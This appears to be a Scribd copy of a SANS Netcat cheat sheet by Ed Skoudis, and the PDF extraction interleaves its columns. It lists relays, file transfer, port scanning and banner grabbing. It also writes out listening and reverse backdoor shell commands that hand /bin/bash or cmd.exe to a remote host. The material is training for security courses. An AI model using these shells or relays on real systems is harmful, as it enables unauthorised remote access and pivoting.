0% found this document useful (0 votes)
132 views2 pages

Sans PDF

Netcat can be used to create relays that forward network connections between ports on the same or different systems. The document provides examples of using Netcat on Windows to create listener-to-client, listener-to-listener, and client-to-client relays by launching Netcat instances that accept connections on one port and connect to another port. Similar techniques for creating relays on Linux using named pipes are also described. The document also outlines other common Netcat commands for tasks like file transfer, banner grabbing, port scanning, and establishing backdoor shells.

Uploaded by

Sandro Melo
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
0% found this document useful (0 votes)
132 views2 pages

Sans PDF

Netcat can be used to create relays that forward network connections between ports on the same or different systems. The document provides examples of using Netcat on Windows to create listener-to-client, listener-to-listener, and client-to-client relays by launching Netcat instances that accept connections on one port and connect to another port. Similar techniques for creating relays on Linux using named pipes are also described. The document also outlines other common Netcat commands for tasks like file transfer, banner grabbing, port scanning, and establishing backdoor shells.

Uploaded by

Sandro Melo
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 2

Netcat Relays on Windows Netcat Command Flags

Netcat
To start, enter a temporary directory where we will $ nc [options] [TargetIPaddr] [port(s)]
Cheat Sheet
create .bat files: By Ed Skoudis
C:\> cd c:\temp The [TargetIPaddr] is simply the other side’s IP
POCKET REFERENCE GUIDE
address or domain name. It is required in client mode
Listener-to-Client Relay: of course (because we have to tell the client where to http://www.sans.org
C:\> echo nc [TargetIPaddr] [port] > connect), and is optional in listen mode.
relay.bat
C:\> nc –l –p [LocalPort] –e relay.bat -l: Listen mode (default is client mode) Purpose
-L: Listen harder (supported only on Windows This cheat sheet provides various tips for
Create a relay that sends packets from the local port version of Netcat). This option makes Netcat a using Netcat on both Linux and Unix,
[LocalPort] to a Netcat Client connected to persistent listener which starts listening again specifically tailored to the SANS 504, 517,
[TargetIPaddr] on port [port] after a client disconnects and 560 courses. All syntax is designed for
-u: UDP mode (default is TCP) the original Netcat versions, released by
-p: Local port (In listen mode, this is port listened Hobbit and Weld Pond. The syntax here
Listener-to-Listener Relay: on. In client mode, this is source port for all can be adapted for other Netcats, including
C:\> echo nc –l –p [LocalPort_2] > packets sent) ncat, gnu Netcat, and others.
relay.bat -e: Program to execute after connection occurs,
C:\> nc –l –p [LocalPort_1] –e
connecting STDIN and STDOUT to the
relay.bat Fundamentals
program
-n: Don’t perform DNS lookups on names of
Create a relay that will send packets from any Fundamental Netcat Client:
machines on the other side
connection on [LocalPort_1] to any connection $ nc [TargetIPaddr] [port]
-z: Zero-I/O mode (Don’t send any data, just emit
on [LocalPort_2] a packet without payload)
Connect to an arbitrary port [port] at IP Address
-wN: Timeout for connects, waits for N seconds [TargetIPaddr]
after closure of STDIN. A Netcat client or
Client-to-Client Relay:
listener with this option will wait for N seconds
C:\> echo nc [NextHopIPaddr] [port2] > Fundamental Netcat Listener:
relay.bat to make a connection. If the connection $ nc –l -p [LocalPort]
C:\> nc [PreviousHopIPaddr] [port] –e doesn’t happen in that time, Netcat stops
relay.bat running.
Create a Netcat listener on arbitrary local port
-v: Be verbose, printing out messages on [LocalPort]
Create a relay that will send packets from the Standard Error, such as when a connection
connection to [PreviousHopIPaddr] on port occurs Both the client and listener take input from STDIN
[port] to a Netcat Client connected to -vv: Be very verbose, printing even more details and send data received from the network to STDOUT
on Standard Error
[NextHopIPaddr] on port [port2]
File Transfer TCP Banner Grabber Netcat Relays on Linux

Grab the banner of any TCP service running on an IP To start, create a FIFO (named pipe) called
Push a file from client to listener:
$ nc –l -p [LocalPort] > [outfile] Address from Linux: backpipe:
$ echo "" | nc –v –n –w1 [TargetIPaddr] $ cd /tmp
[start_port]-[end_port] $ mknod backpipe p
Listen on [LocalPort], store results in [outfile]

$ nc –w3 [TargetIPaddr] [port] < Attempt to connect to each port in a range from
[infile] [end_port] to [start_port] on IP Address Listener-to-Client Relay:
$ nc –l –p [LocalPort] 0<backpipe | nc
[TargetIPaddr] running verbosely (-v), not [TargetIPaddr] [port] | tee backpipe
Push [infile] to [TargetIPaddr] on [port] resolving names (-n), and waiting no more than 1
second for a connection to occur (-w1). Then send a Create a relay that sends packets from the local port
Pull file from listener back to client: blank string to the open port and print out any [LocalPort] to a Netcat client connected to
$ nc –l -p [LocalPort] < [infile] banner received in response
[TargetIPaddr] on port [port]
Listen on [LocalPort], prep to push [infile] Add –r to randomize destination ports within the
range Listener-to-Listener Relay:
$ nc –w3 [TargetIPaddr] [port] >
$ nc –l –p [LocalPort_1] 0<backpipe |
[outfile] Add –p [port] to specify a source port for the nc –l –p [LocalPort_2] | tee backpipe
scan
Connect to [TargetIPaddr] on [port] and
Backdoor Shells Create a relay that sends packets from any
retrieve [outfile] connection on [LocalPort_1] to any connection
Listening backdoor shell on Linux: on [LocalPort_2]
TCP Port Scanner $ nc –l –p [LocalPort] –e /bin/bash
Listening backdoor shell on Windows:
Port scan an IP Address: C:\> nc –l –p [LocalPort] –e cmd.exe
$ nc –v –n –z –w1 [TargetIPaddr] Client-to-Client Relay:
[start_port]-[end_port] $ nc [PreviousHopIPaddr] [port]
Create a shell on local port [LocalPort] that can 0<backpipe | nc [NextHopIPaddr]
then be accessed using a fundamental Netcat client [port2] | tee backpipe
Attempt to connect to each port in a range from
[end_port] to [start_port] on IP Address
Reverse backdoor shell on Linux: Create a relay that sends packets from the
[TargetIPaddr] running verbosely (-v on Linux, - $ nc [YourIPaddr] [port] –e /bin/bash connection to [PreviousHopIPaddr] on port
vv on Windows), not resolving names (-n), without Reverse backdoor shell on Windows: [port] to a Netcat client connected to
sending any data (-z), and waiting no more than 1 C:\> nc [YourIPaddr] [port] –e cmd.exe [NextHopIPaddr] on port [port2]
second for a connection to occur (-w1)
Create a reverse shell that will attempt to connect to
The randomize ports (-r) switch can be used to [YourIPaddr] on local port [port]. This shell
choose port numbers randomly in the range can then be captured using a fundamental nc listener

You might also like